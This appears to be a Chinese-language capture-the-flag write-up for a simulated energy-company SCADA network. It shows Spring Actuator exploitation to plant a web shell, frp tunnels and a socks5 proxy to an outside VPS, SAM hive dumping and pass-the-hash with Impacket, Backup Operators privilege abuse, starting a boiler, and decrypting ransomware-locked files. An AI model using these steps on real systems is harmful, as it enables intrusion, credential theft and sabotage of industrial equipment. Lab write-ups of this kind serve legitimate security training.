ThermalPower 第一关 评估暴露在公网的服务的安全性,尝试建立通向生产区的立足点。
fscan扫描外网
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 D:\shentou\fscan>fscan.exe -h 39.99.144.130 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan 39.99.144.130:22 open 39.99.144.130:8080 open [*] alive ports len is: 2 start vulscan [*] WebTitle http://39.99.144.130:8080 code:302 len:0 title:None 跳转url: http://39.99.144.130:8080/login;jsessionid=24A74329D58D703BCF1D26E1FFF9EB4F [*] WebTitle http://39.99.144.130:8080/login;jsessionid=24A74329D58D703BCF1D26E1FFF9EB4F code:200 len:2936 title:火创能源监控画面管理平台 [+] PocScan http://39.99.144.130:8080 poc-yaml-spring-actuator-heapdump-file [+] PocScan http://39.99.144.130:8080 poc-yaml-springboot-env-unauth spring2
http://39.99.144.130:8080/actuator/env
http://39.99.144.130:8080/actuator/heapdump
1 algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES
一把梭了,写个蚁剑木马,并拿到flag01
1 flag01: flag{6e2be8af-cd09-4736-a66a-e9b3f0ddedf7}
蚁剑连接后,执行ifconfig,发现内网IP是172.22.17.213
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 172.22.17.6:445 open 172.22.17.6:139 open 172.22.17.6:135 open 172.22.17.6:80 open 172.22.17.6:21 open 172.22.17.213:22 open 172.22.17.213:8080 open [*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=C93ED4773035B588919EB46A5CF88927 [*] NetInfo [*]172.22.17.6 [->]WIN-ENGINEER [->]172.22.17.6 [*] WebTitle http://172.22.17.213:8080/login;jsessionid=C93ED4773035B588919EB46A5CF88927 code:200 len:2936 title:火创能源监控画面管理平台 [+] ftp 172.22.17.6:21:anonymous [->]Modbus [->]PLC [->]web.config [->]WinCC [->]内部软件 [->]火创能源内部资料 [*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER [*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - / [+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file [+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
整理一下信息
接下来做内网穿透,vps上部署frps服务器端
frps.toml
1 2 [common] bindPort = 7000
运行./frps -c frps.toml
跳板机上部署frpc客户端
1 2 3 4 5 6 7 8 9 serverAddr = "47.120.14.151" serverPort = 7000 [[proxies]] name = "web" type = "tcp" localIP = "172.22.17.6" localPort = 80 remotePort = 20022
运行./frpc -c frpc1.toml
frpc2.toml(21端口的ftp服务)
1 2 3 4 5 6 7 8 9 serverAddr = "47.120.14.151" serverPort = 7000 [[proxies]] name = "ftp" type = "tcp" localIP = "172.22.17.6" localPort = 21 remotePort = 20033
运行./frpc -c frpc2.toml
火创能源内部通知.docx中发现:
内部员工通讯录.xlsx泄露所有员工账户名和工号,故已满足登录条件
火创能源内部资料/SCADA.txt
1 2 3 WIN-SCADA: 172.22.26.xx Username: Administrator Password: IYnT3GyCiy3
故需要扫描26网段
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 start infoscan (icmp) Target 172.22.26.11 is alive [*] Icmp alive hosts len is: 1 172.22.26.11:445 open 172.22.26.11:139 open 172.22.26.11:135 open 172.22.26.11:80 open 172.22.26.11:1433 open [*] alive ports len is: 5 start vulscan [*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA [+] mssql 172.22.26.11:1433:sa 123456 [*] NetInfo [*]172.22.26.11 [->]WIN-SCADA [->]172.22.26.11 [*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server
发现windows主机172.22.26.11,存在mssql弱口令登录,并且应该可以用之前获得的账户密码rdp登录
172.22.17.6这台机子应该没什么用了,把frpc进程kill掉,重新部署新的frpc服务
frpc1.toml
1 2 3 4 5 6 7 8 9 serverAddr = "47.120.14.151" serverPort = 7000 [[proxies]] name = "web" type = "tcp" localIP = "172.22.26.11" localPort = 80 remotePort = 20022
运行./frpc -c frpc1.toml
frpc2.toml
1 2 3 4 5 6 7 8 9 serverAddr = "47.120.14.151" serverPort = 7000 [[proxies]] name = "mssql" type = "tcp" localIP = "172.22.26.11" localPort = 1433 remotePort = 20033
运行./frpc -c frpc2.toml
frpc3.toml
1 2 3 4 5 6 7 8 9 serverAddr = "47.120.14.151" serverPort = 7000 [[proxies]] name = "rdp" type = "tcp" localIP = "172.22.26.11" localPort = 3389 remotePort = 20044
运行./frpc -c frpc3.toml
使用MDUT成功登录mssql,可以访问到主机上所有文件并执行命令
第二关 尝试接管 SCADA 工程师的个人 PC,并通过滥用 Windows 特权组提升至系统权限。
根据内部员工通讯录.xlsx中泄露的个人信息,rdp登录172.22.17.6,以chenhua/chenhua@0813为例
做一下内网穿透,把3389端口弄出来
1 2 3 4 5 6 7 8 9 serverAddr = "47.120.14.151" serverPort = 7000 [[proxies]] name = "rdp111" type = "tcp" localIP = "172.22.17.6" localPort = 3389 remotePort = 20022
运行./frpc -c frpc1.toml
chenhua身份rdp登录172.22.17.6
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 whoami /groups 组信息 ----------------- 组名 类型 SID 属性 ====================================== ====== ============ ============================== Everyone 已知组 S-1-1-0 必需的组, 启用于默认, 启用的组 BUILTIN\Backup Operators 别名 S-1-5-32-551 只用于拒绝的组 BUILTIN\Remote Desktop Users 别名 S-1-5-32-555 必需的组, 启用于默认, 启用的组 BUILTIN\Users 别名 S-1-5-32-545 必需的组, 启用于默认, 启用的组 NT AUTHORITY\REMOTE INTERACTIVE LOGON 已知组 S-1-5-14 必需的组, 启用于默认, 启用的组 NT AUTHORITY\INTERACTIVE 已知组 S-1-5-4 必需的组, 启用于默认, 启用的组 NT AUTHORITY\Authenticated Users 已知组 S-1-5-11 必需的组, 启用于默认, 启用的组 NT AUTHORITY\This Organization 已知组 S-1-5-15 必需的组, 启用于默认, 启用的组 NT AUTHORITY\本地帐户 已知组 S-1-5-113 必需的组, 启用于默认, 启用的组 LOCAL 已知组 S-1-2-0 必需的组, 启用于默认, 启用的组 NT AUTHORITY\NTLM Authentication 已知组 S-1-5-64-10 必需的组, 启用于默认, 启用的组 Mandatory Label\Medium Mandatory Level 标签 S-1-16-8192
可以看到该用户是属于 Backup Operators 组的一部分,默认情况下会授予该组 SeBackup 和 SeRestore 权限,SeBackup 和 SeRestore 权限允许用户读取和写入系统中的任何文件,而忽略任何适当的 DACL(自由访问控制列表)。 此权限存在的背后动机是允许某些用户在系统中执行备份操作,而无需授予其完全的管理权限。
一旦拥有 SeBackup 和 SeRestore 权限,攻击者就可以通过使用多种技术轻松进行提权操作。 包括复制 SAM 和 SYSTEM 注册表配置单元(registry hives)以提取本地管理员的密码 hash 值。
但是这里并没有给用户默认分配 SeBackup 权限
1 2 3 4 5 6 7 8 9 whoami /priv 特权信息 ---------------------- 特权名 描述 状态 ============================= ============== ====== SeChangeNotifyPrivilege 绕过遍历检查 已启用 SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用
如果有的话,利用方法蛮多的
虽然配置出了点问题,但是这里可以用注册表 SAM 转储提权,直接转储 sam 和 system,发现不需要特权即可以成功导出:
1 2 3 4 5 6 7 8 9 PS C:\Users\chenhua\Desktop> cd C:\ PS C:\> mkdir Temp PS C:\> cd C:\Temp PS C:\Temp> reg save hklm\sam c:\Temp\sam PS C:\Temp> reg save hklm\system c:\Temp\system
下载到本地,提取 Administrator 的 NTLM hash:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ┌──(root㉿kali)-[/home/kali/桌面] └─# impacket-secretsdump -sam sam -system system LOCAL Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x6c2be46aaccdf65a9b7be2941d6e7759 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5::: chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658::: zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215::: wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3::: zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81::: zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d::: lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a::: liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471::: wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07::: zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432::: chenhua:1009:aad3b435b51404eeaad3b435b51404ee:07ff24422b538b97f3c297cc8ddc7615::: [*] Cleaning up...
在跳板机上建立一个socks5隧道
1 2 3 4 5 6 7 8 [common] server_addr = 47.120.14.151 server_port = 7000 [socks5] type = tcp plugin = socks5 remote_port = 5000
1 2 3 4 5 6 7 8 9 10 11 12 proxychains python wmiexec.py administrator@172.22.17.6 -hashes :f82292b7ac79b05d5b0e3d302bd0d279 -codec gbk C:\Users\Administrator\flag>type flag02.txt _____.__ _______ ________ _/ ____\ | _____ ____ \ _ \ \_____ \ \ __\| | \__ \ / ___\/ /_\ \ / ____/ | | | |__/ __ \_/ /_/ > \_/ \/ \ |__| |____(____ /\___ / \_____ /\_______ \ \//_____/ \/ \/ flag02: flag{27d59839-ce43-41eb-8948-a568ee0544b9}
方法2 SeBackupPrivilege 提权
SeBackupPrivilege 权限用来实现备份操作,允许文件内容检索,即使文件上的安全描述符可能未授予此类访问权限。diskshadow 是 Windows 的内置功能,可以帮助创建备份。参考 hackingarticles,可以在本地或 DC 进行权限提升。
用户在Backup Operators组内,所以可以使用Backup Operators组内权限提权
打开 powershell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 PS C:\Users\chenhua> cd .\Desktop\ PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll PS C:\Users\chenhua\Desktop> Set-SeBackupPrivilege PS C:\Users\chenhua\Desktop> Get-SeBackupPrivilege SeBackupPrivilege is enabled PS C:\Users\chenhua\Desktop> dir C:\Users\Administrator\flag 目录: C:\Users\Administrator\flag Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2025/4/30 20:55 350 flag02.txt PS C:\Users\chenhua\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwrite Copied 350 bytes
之后就可以在桌面打开flag02.txt
第三关 尝试接管 SCADA 工程师站,并启动锅炉。
Administrator身份rdp登录172.22.26.11,直接点击锅炉开就有flag
1 flag{bcd080d5-2cf1-4095-ac15-fa4bef9ca1c0}
第四关 尝试获取 SCADA 工程师站中的数据库备份,并分析备份文件是否泄漏了敏感数据。
还是Administrator身份rdp登录172.22.26.11,桌面上txt文档里提示文件被勒索病毒加密
privateKey
1 <RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>
先把XML转成PEM格式(https://www.ssleye.com/ssltool/pem_xml.html )
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 -----BEGIN PRIVATE KEY----- MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+ PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3 YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17 8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/ xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0 VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy PHvLZB6D8zSyuGw= -----END PRIVATE KEY-----
然后找个在线网站把encryptedAesKey解一下(https://www.lddgo.net/encrypt/rsa )
encryptedAesKey
1 lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g=
解密后
1 cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=
最后写个aes脚本解一下sql文件,把前16位作为iv
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 from Crypto.Cipher import AESfrom Crypto.Util.Padding import unpadimport base64encrypted_file = 'ScadaDB.sql.locky' with open (encrypted_file, 'rb' ) as file: encrypted_data = file.read() key = 'cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=' key = base64.b64decode(key) iv = encrypted_data[:16 ] cipher = AES.new(key, AES.MODE_CBC, IV=iv) decrypted_data = unpad(cipher.decrypt(encrypted_data[16 :]), AES.block_size) decrypted_file = 'decrypted_file.txt' with open (decrypted_file, 'wb' ) as file: file.write(decrypted_data) print (f'文件解密完成,解密后的数据已保存到 {decrypted_file} ' )
在解密后的文件里找到flag04
1 flag{63cd8cd5-151f-4f29-bdc7-f80312888158}
